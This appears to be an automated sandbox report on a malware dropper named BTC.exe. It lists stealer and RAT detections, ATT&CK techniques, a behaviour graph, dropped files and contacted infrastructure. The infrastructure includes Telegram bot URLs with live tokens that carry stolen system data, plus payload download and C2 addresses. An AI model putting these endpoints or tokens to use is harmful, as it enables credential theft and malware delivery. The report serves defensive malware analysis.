                            Source: Yara matchFile source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPED
                            Yara detected WorldWind Stealer
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.4469429984.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.4469944759.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Yara detected XWorm
                            Source: Yara matchFile source: 0.2.BTC.exe.2c80488.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.BTC.exe.2c75848.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.Windows Defender Service Host.exe.f60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000007.00000000.2009427541.0000000000F62000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: BTC.exe PID: 2796, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Windows Defender Service Host.exe PID: 7140, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, type: DROPPED
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid Accounts131
                            Windows Management Instrumentation                            		1
                            Scripting                            		1
                            DLL Side-Loading                            		41
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		2
                            File and Directory Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Web Service                            		Exfiltration Over Other Network Medium1
                            Data Encrypted for Impact
                            CredentialsDomainsDefault Accounts1
                            Native API                            		1
                            DLL Side-Loading                            		112
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		21
                            Input Capture                            		124
                            System Information Discovery                            		Remote Desktop Protocol2
                            Data from Local System                            		3
                            Ingress Tool Transfer                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts3
                            Scheduled Task/Job                            		3
                            Scheduled Task/Job                            		3
                            Scheduled Task/Job                            		221
                            Obfuscated Files or Information                            		Security Account Manager1
                            Query Registry                            		SMB/Windows Admin Shares1
                            Screen Capture                            		11
                            Encrypted Channel                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCron21
                            Registry Run Keys / Startup Folder                            		21
                            Registry Run Keys / Startup Folder                            		22
                            Software Packing                            		NTDS441
                            Security Software Discovery                            		Distributed Component Object Model21
                            Input Capture                            		1
                            Non-Standard Port                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Timestomp                            		LSA Secrets251
                            Virtualization/Sandbox Evasion                            		SSH1
                            Clipboard Data                            		4
                            Non-Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            DLL Side-Loading                            		Cached Domain Credentials3
                            Process Discovery                            		VNCGUI Input Capture115
                            Application Layer Protocol                            		Data Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                            Masquerading                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
                            Virtualization/Sandbox Evasion                            		Proc Filesystem1
                            Remote System Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                            Process Injection                            		/etc/passwd and /etc/shadow11
                            System Network Configuration Discovery                            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                            Hidden Files and Directories                            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                            Hidden Users                            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1503194 Sample: BTC.exe Startdate: 03/09/2024 Architecture: WINDOWS Score: 100 118 api.telegram.org 2->118 120 payloads-poison.000webhostapp.com 2->120 122 5 other IPs or domains 2->122 142 Multi AV Scanner detection for domain / URL 2->142 144 Suricata IDS alerts for network traffic 2->144 146 Found malware configuration 2->146 150 36 other signatures 2->150 12 BTC.exe 8 2->12         started        16 Window Security.exe 2->16         started        18 Windows Security Health Service.exe 2->18         started        20 3 other processes 2->20 signatures3 148 Uses the Telegram API (likely for C&C communication) 118->148 process4 file5 110 C:\Users\user\AppData\Roaming\update.exe, PE32 12->110 dropped 112 C:\Users\user\AppData\Roaming\svchost.exe, PE32 12->112 dropped 114 C:\Users\user\AppData\Roaming\crack.exe, PE32 12->114 dropped 116 4 other malicious files 12->116 dropped 202 Creates files with lurking names (e.g. Crack.exe) 12->202 204 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->204 206 Drops PE files with benign system names 12->206 22 Window Security.exe 12->22         started        27 svchost.exe 14 158 12->27         started        29 Cracked.exe 9 12->29         started        33 3 other processes 12->33 31 cmd.exe 16->31         started        signatures6 process7 dnsIp8 126 ip-api.com 208.95.112.1, 49706, 49707, 80 TUT-ASUS United States 22->126 128 91.134.207.16, 49722, 49740, 80 OVHFR France 22->128 130 us-east-1.route-1.000webhost.awex.io 145.14.144.231, 443, 49721 AWEXUS Netherlands 22->130 94 C:\Users\user\...\Windows Security.exe, PE32 22->94 dropped 172 Contains functionality to hide user accounts 22->172 194 4 other signatures 22->194 35 Windows Security.exe 22->35         started        47 16 other processes 22->47 96 C:\Users\user\AppData\...96VWZAPQSQL.xlsx, ASCII 27->96 dropped 98 C:\Users\user\AppData\...98VWZAPQSQL.docx, ASCII 27->98 dropped 100 C:\Users\user\AppData\...behaviorgraphIGIYTFFYT.jpg, ASCII 27->100 dropped 108 2 other malicious files 27->108 dropped 174 System process connects to network (likely due to code injection or exploit) 27->174 176 Multi AV Scanner detection for dropped file 27->176 178 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 27->178 196 2 other signatures 27->196 49 3 other processes 27->49 102 C:\...\Windows Security Health Service.exe, PE32 29->102 dropped 104 C:\Users\user\AppData\...\Cracked.exe.log, CSV 29->104 dropped 180 Protects its processes via BreakOnTermination flag 29->180 182 Creates files with lurking names (e.g. Crack.exe) 29->182 184 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 29->184 39 cmd.exe 29->39         started        41 cmd.exe 29->41         started        186 Uses ping.exe to sleep 31->186 43 Window Security.exe 31->43         started        51 3 other processes 31->51 132 api.telegram.org 149.154.167.220, 443, 49705, 49708 TELEGRAMRU United Kingdom 33->132 134 165.227.91.90, 49709, 49749, 49767 DIGITALOCEAN-ASNUS United States 33->134 136 4 other IPs or domains 33->136 106 C:\Users\user\AppData\Local\...\crack.exe.log, CSV 33->106 dropped 188 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 33->188 190 Tries to harvest and steal browser information (history, passwords, etc) 33->190 192 Tries to harvest and steal WLAN passwords 33->192 45 cmd.exe 33->45         started        53 4 other processes 33->53 file9 signatures10 process11 dnsIp12 124 146.190.29.250, 49710, 49719, 49720 UUNETUS United States 35->124 152 Protects its processes via BreakOnTermination flag 35->152 154 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->154 156 Installs a global keyboard hook 35->156 55 schtasks.exe 35->55         started        57 Windows Security Health Service.exe 39->57         started        63 2 other processes 39->63 158 Uses schtasks.exe or at.exe to add and modify task schedules 41->158 65 2 other processes 41->65 61 cmd.exe 43->61         started        160 Uses ping.exe to sleep 45->160 162 Uses ping.exe to check the status of other devices and networks 45->162 164 Uses netsh to modify the Windows network and firewall settings 45->164 67 2 other processes 45->67 166 Loading BitLocker PowerShell Module 47->166 69 17 other processes 47->69 71 7 other processes 49->71 168 Tries to harvest and steal WLAN passwords 53->168 73 8 other processes 53->73 signatures13 process14 dnsIp15 75 conhost.exe 55->75         started        138 185.252.232.158, 49711, 49712, 49745 QUICKPACKETUS Germany 57->138 140 64.23.232.116, 49713, 49727, 49746 AFFINITY-FTLUS United States 57->140 198 Protects its processes via BreakOnTermination flag 57->198 200 Uses ping.exe to sleep 61->200 77 Window Security.exe 61->77         started        79 conhost.exe 61->79         started        81 chcp.com 61->81         started        83 PING.EXE 61->83         started        signatures16 process17 process18 85 cmd.exe 77->85         started        signatures19 170 Uses ping.exe to sleep 85->170 88 conhost.exe 85->88         started        90 chcp.com 85->90         started        92 PING.EXE 85->92         started        process20

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            BTC.exe63%VirustotalBrowse
                            BTC.exe100%AviraTR/Dropper.Gen
                            BTC.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Roaming\Cracked.exe87%ReversingLabsByteCode-MSIL.Backdoor.AsyncRAT
                            C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe100%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                            C:\Users\user\AppData\Roaming\Window Security.exe100%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                            C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe81%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
                            C:\Users\user\AppData\Roaming\Windows Security Health Service.exe87%ReversingLabsByteCode-MSIL.Backdoor.AsyncRAT
                            C:\Users\user\AppData\Roaming\crack.exe92%ReversingLabsByteCode-MSIL.Trojan.Zilla
                            C:\Users\user\AppData\Roaming\svchost.exe100%ReversingLabsByteCode-MSIL.Backdoor.AsyncRat
                            C:\Users\user\AppData\Roaming\update.exe96%ReversingLabsByteCode-MSIL.Backdoor.AsyncRat

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            SourceDetectionScannerLabelLink
                            ip-api.com0%VirustotalBrowse
                            api.mylnikov.org3%VirustotalBrowse
                            api.telegram.org2%VirustotalBrowse
                            us-east-1.route-1.000webhost.awex.io2%VirustotalBrowse
                            icanhazip.com0%VirustotalBrowse
                            201.75.14.0.in-addr.arpa0%VirustotalBrowse
                            payloads-poison.000webhostapp.com15%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                            https://aka.ms/pscore6lB0%URL Reputationsafe
                            https://nuget.org/nuget.exe0%URL Reputationsafe
                            http://ip-api.com0%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                            http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                            https://contoso.com/Icon0%URL Reputationsafe
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                            https://www.ecosia.org/newtab/0%URL Reputationsafe
                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                            http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%URL Reputationsafe
                            https://contoso.com/License0%URL Reputationsafe
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                            https://contoso.com/0%URL Reputationsafe
                            http://nuget.org/NuGet.exe0%URL Reputationsafe
                            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                            https://support.mozilla.org0%URL Reputationsafe
                            https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=588170%Avira URL Cloudsafe
                            https://api.telegram.org/bot0%Avira URL Cloudsafe
                            https://go.microPackageManagementp0%Avira URL Cloudsafe
                            https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-with-shades.svg0%Avira URL Cloudsafe
                            https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=62917491480%Avira URL Cloudsafe
                            https://github.com/LimerBoy/StormKitty0%Avira URL Cloudsafe
                            http://91.134.207.16/svchost.exe0%Avira URL Cloudsafe
                            146.190.29.2500%Avira URL Cloudsafe
                            https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=588172%VirustotalBrowse
                            https://payloads-poison.000webhostapp.com/r77-x86.dll100%Avira URL Cloudphishing
                            https://api.telegram.org/bot1%VirustotalBrowse
                            https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=62910%Avira URL Cloudsafe
                            http://91.134.207.16/svchost.exe11%VirustotalBrowse
                            https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-with-shades.svg1%VirustotalBrowse
                            https://github.com/LimerBoy/StormKitty2%VirustotalBrowse
                            http://91.134.207.16/WinSCP.com0%Avira URL Cloudsafe
                            https://api.mylnikov.org0%Avira URL Cloudsafe
                            http://api.ipify.org/0%Avira URL Cloudsafe
                            https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=62917491481%VirustotalBrowse
                            https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage0%Avira URL Cloudsafe
                            http://91.134.207.16/ngrok.exe0%Avira URL Cloudsafe
                            http://api.ipify.org/0%VirustotalBrowse
                            https://api.mylnikov.org3%VirustotalBrowse
                            https://payloads-poison.000webhostapp.com/r77-x86.dll8%VirustotalBrowse
                            http://api.telegram.orgd0%Avira URL Cloudsafe
                            http://91.134.207.16/WinSCP.com8%VirustotalBrowse
                            http://icanhazip.com0%Avira URL Cloudsafe
                            http://91.134.207.16/Install.exe0%Avira URL Cloudsafe
                            https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=62911%VirustotalBrowse
                            146.190.29.2502%VirustotalBrowse
                            https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage2%VirustotalBrowse
                            https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP0%Avira URL Cloudsafe
                            http://91.134.207.16/ngrok.exe9%VirustotalBrowse
                            https://go.microP0%Avira URL Cloudsafe
                            https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders...0%Avira URL Cloudsafe
                            http://freegeoip.net/xml/0%Avira URL Cloudsafe
                            https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-eating-a-cassette.svg0%Avira URL Cloudsafe
                            http://icanhazip.com0%VirustotalBrowse
                            https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=10960%Avira URL Cloudsafe
                            http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                            http://91.134.207.16/autoupdate1.exe0%Avira URL Cloudsafe
                            http://91.134.207.16/Install.exe11%VirustotalBrowse
                            https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP2%VirustotalBrowse
                            http://freegeoip.net/xml/0%VirustotalBrowse
                            https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:150%Avira URL Cloudsafe
                            http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                            https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/send0%Avira URL Cloudsafe
                            https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=10962%VirustotalBrowse
                            https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=0%Avira URL Cloudsafe
                            https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders...2%VirustotalBrowse
                            https://github.com/Pester/Pester0%Avira URL Cloudsafe
                            http://crl.miu0%Avira URL Cloudsafe
                            http://91.134.207.16/autoupdate1.exe12%VirustotalBrowse
                            https://www.ifconfig.me/0%Avira URL Cloudsafe
                            https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-eating-a-cassette.svg1%VirustotalBrowse
                            https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/send2%VirustotalBrowse
                            167.99.94.2060%Avira URL Cloudsafe
                            https://www.ifconfig.me/0%VirustotalBrowse
                            https://github.com/Pester/Pester1%VirustotalBrowse
                            https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=1%VirustotalBrowse
                            https://github.com/LimerBoy/StormKitty0&eq0%Avira URL Cloudsafe
                            https://payloads-poison.000webhostapp.com/r77-x64.dll100%Avira URL Cloudphishing
                            http://91.134.207.16/rdpinstall.exe0%Avira URL Cloudsafe
                            http://91.134.207.16/update.exe0%Avira URL Cloudsafe
                            https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True0%Avira URL Cloudsafe
                            https://api.telegram.orgd0%Avira URL Cloudsafe
                            http://api.mylnikov.orgd0%Avira URL Cloudsafe
                            https://api.telegram.org/file/bot0%Avira URL Cloudsafe
                            167.99.94.2061%VirustotalBrowse
                            http://api.telegram.org0%Avira URL Cloudsafe
                            http://api.mylnikov.org0%Avira URL Cloudsafe
                            http://91.134.207.16/ngrok.exe=set0%Avira URL Cloudsafe
                            http://91.134.207.16/rdpinstall.exe10%VirustotalBrowse
                            https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=629170%Avira URL Cloudsafe
                            https://api.telegram.org0%Avira URL Cloudsafe
                            http://icanhazip.com/0%Avira URL Cloudsafe
                            https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d0%Avira URL Cloudsafe
                            165.227.91.900%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            ip-api.com
                            		208.95.112.1
                            		truetrueunknown
                            api.mylnikov.org
                            		172.67.196.114
                            		truetrueunknown
                            api.telegram.org
                            		149.154.167.220
                            		truetrueunknown
                            us-east-1.route-1.000webhost.awex.io
                            		145.14.144.231
                            		truefalseunknown
                            icanhazip.com
                            		104.16.185.241
                            		truetrueunknown
                            201.75.14.0.in-addr.arpa
                            		unknown
                            		unknowntrueunknown
                            payloads-poison.000webhostapp.com
                            		unknown
                            		unknowntrueunknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=6291749148true
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.134.207.16/svchost.exefalse
                            • 11%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            146.190.29.250true
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDPtrue
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders...true
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15true
                            • Avira URL Cloud: safe
                            		unknown
                            167.99.94.206true
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://payloads-poison.000webhostapp.com/r77-x64.dlltrue
                            • Avira URL Cloud: phishing
                            		unknown
                            https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=Truetrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://icanhazip.com/true
                            • Avira URL Cloud: safe
                            		unknown
                            165.227.91.90true
                            • Avira URL Cloud: safe
                            		unknown
                            http://ip-api.com/json/true
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders...true
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866true
                            • Avira URL Cloud: safe
                            		unknown
